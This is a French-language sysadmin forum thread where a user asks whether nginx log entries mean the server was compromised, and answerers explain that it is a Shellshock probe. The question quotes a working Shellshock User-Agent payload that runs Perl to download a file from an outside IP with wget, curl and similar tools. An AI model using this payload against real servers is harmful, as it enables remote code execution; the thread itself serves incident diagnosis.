1 votes

Srik avatar

Entrées de journal d'accès nginx douteuses

Demandé el 14 de Janvier, 2016
Quand la question a-t-elle été
404 affichage
Nombre de visites la question a
2 Réponses
Nombre de réponses aux questions
Résolu
Situation réelle de la question

Il y avait plusieurs entrées comme ci-dessous dans le journal d'accès nginx. Comment savoir quel est le résultat de ces scripts et si mon serveur est compromis ou non?

162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-"
Demandé el 14 de Janvier, 2016 par Srik

Réponses

Trop de publicités?

2voto

Mark Stosberg avatar
Mark Stosberg Points 3665

Remarquez la chaîne magique () { :; };. Ils essaient de fouiller pour voir si votre serveur est vulnérable à l'exploit ShellShock. Perl est utilisé ici pour imprimer et voir si l'attaque a réussi.

Testez si votre serveur est vulnérable à ShellShock. S'il ne l'est pas, vous êtes en sécurité.

Voir aussi: Mon serveur est-il vulnérable à une exploitation perl?

Répondu el 15 de Janvier, 2016 par Mark Stosberg (3665 Points )

2voto

eric wedaa avatar
eric wedaa Points 21

Il cherche à vous attaquer avec shellshock. Le drôle, c'est qu'il a mal configuré son attaque. Je fais la capture de logiciels malveillants et son wget/fetch/etc échoue parce que son paquet n'est pas là :-)

Répondu el 20 de Janvier, 2016 par eric wedaa (21 Points )

Questions en vedette

Top Tags

Dans notre réseau

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

Yandex
X